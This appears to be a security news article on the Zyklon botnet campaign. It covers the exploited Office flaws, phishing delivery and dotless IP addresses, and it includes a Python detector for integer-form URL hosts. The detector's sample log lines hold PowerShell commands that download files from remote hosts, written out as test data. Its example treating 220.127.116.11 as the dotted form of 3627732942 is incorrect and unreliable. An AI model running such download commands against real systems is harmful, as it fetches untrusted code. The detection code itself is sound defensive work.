Dubbed Zyklon, the fully-featured malware has resurfaced after almost two years and has primarily been found targeting telecommunications, insurance and financial services.
Active since early 2016, Zyklon is an HTTP botnet malware that communicates with its command-and-control servers over the Tor anonymising network and allows attackers to remotely steal keylogs and sensitive data, such as passwords stored in web browsers and email clients.
Zyklon malware is also capable of executing additional plugins, including secretly using infected systems for DDoS attacks and cryptocurrency mining.
Different versions of the Zyklon malware have previously been found advertised on a popular underground marketplace for $75 (normal build) and $125 (Tor-enabled build).
According to a recently published report by FireEye, the attackers behind the campaign are leveraging the following three vulnerabilities in Microsoft Office to execute a PowerShell script on the targeted computers, which downloads the final payload from its command-and-control (C&C) server.
1) .NET Framework RCE Vulnerability (CVE-2017-8759)—this remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input, allowing an attacker to take control of an affected system by tricking victims into opening a specially crafted malicious document file sent over email. Microsoft already released a security patch for this flaw in its September updates.
2) Microsoft Office RCE Vulnerability (CVE-2017-11882)—this 17-year-old memory corruption flaw, which Microsoft patched in its November patch update, allows a remote attacker to execute malicious code on the targeted systems without requiring any user interaction after opening a malicious document.
3) Dynamic Data Exchange Protocol (DDE Exploit)—this technique allows attackers to leverage a built-in feature of Microsoft Office, called DDE, to perform code execution on the targeted device without requiring Macros to be enabled or memory corruption.
As explained by the researchers, attackers are actively exploiting these three vulnerabilities to deliver Zyklon malware using spear phishing emails, which typically arrive with an attached ZIP file containing a malicious Office doc file.
Once opened, the malicious doc file equipped with one of these vulnerabilities immediately runs a PowerShell script, which eventually downloads the final payload, i.e., Zyklon HTTP malware, onto the infected computer.
“In all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded,” the FireEye researchers said.
“The Pause.ps1 script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode.”
“The injected code is responsible for downloading the final payload from the server. The final stage payload is a PE executable compiled with .Net framework.”
Interestingly, the PowerShell script connects to a dotless IP address (example: http://3627732942) to download the final payload.
What is a dotless IP address? If you are unaware, dotless IP addresses, sometimes referred to as ‘decimal addresses,’ are decimal values of IPv4 addresses (which are normally represented in dotted-quad notation). Almost all modern web browsers resolve a decimal IP address to its equivalent IPv4 address when it is opened with “http://” followed by the decimal value.
For example, Google’s IP address 220.127.116.11 can also be represented as http://3627732942 in decimal values (Try this online converter).
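Because a dotless host never matches a dotted-quad blocklist entry or a domain filter, it helps to normalise such hosts before matching. The following is an added example, not code from the FireEye report or the original article: it pulls URLs out of constructed script-log lines and converts integer-form hosts to dotted-quad notation. It goes beyond the decimal case described above by also handling the hexadecimal and leading-zero octal forms that URL parsers accept; the function names and sample lines are assumptions.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample lines (not taken from the FireEye report). The first host
# is the decimal value quoted in the article; the rest are documentation hosts.
SAMPLE_LOG = """\
ScriptBlock: (New-Object Net.WebClient).DownloadFile('http://3627732942/file.exe', $p)
ScriptBlock: Invoke-WebRequest -Uri "http://0xC0000201/a" -OutFile $t
ScriptBlock: Invoke-WebRequest -Uri 'https://example.com/12345/update.msi'
ScriptBlock: Invoke-WebRequest -Uri http://192.0.2.10/x
"""

URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
INT_HOST_RE = re.compile(r"0x[0-9a-f]+|[0-9]+")  # one integer, no dots

def dotless_to_ipv4(host):
    """Return the dotted-quad form if host is one 32-bit integer, else None."""
    host = host.lower()
    if not INT_HOST_RE.fullmatch(host):
        return None                      # domain names and dotted quads
    if host.startswith("0x"):
        base = 16
    elif len(host) > 1 and host[0] == "0":
        base = 8                         # a leading zero is read as octal
    else:
        base = 10
    try:
        value = int(host, base)
    except ValueError:                   # e.g. "089" is not valid octal
        return None
    return str(ipaddress.IPv4Address(value)) if value <= 0xFFFFFFFF else None

def find_dotless_urls(text):
    """Return (url, dotted_quad) for every URL whose host is an integer IPv4."""
    hits = []
    for match in URL_RE.finditer(text):
        url = match.group(0)
        try:
            host = urlsplit(url).hostname or ""
        except ValueError:               # malformed bracketed host
            continue
        ip = dotless_to_ipv4(host)
        if ip:
            hits.append((url, ip))
    return hits
```

Running `find_dotless_urls` over proxy or PowerShell script-block logs gives the normalised address to compare against existing IP indicators; ordinary dotted-quad and domain hosts are left unflagged.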
The best way to protect yourself and your organisation from such malware attacks is always to be suspicious of any uninvited document sent via email and never to click on links inside those documents without adequately verifying the source.
Most importantly, always keep your software and systems up-to-date, as threat actors incorporate recently discovered, but patched, vulnerabilities in popular software—Microsoft Office, in this case—to increase the potential for successful infections.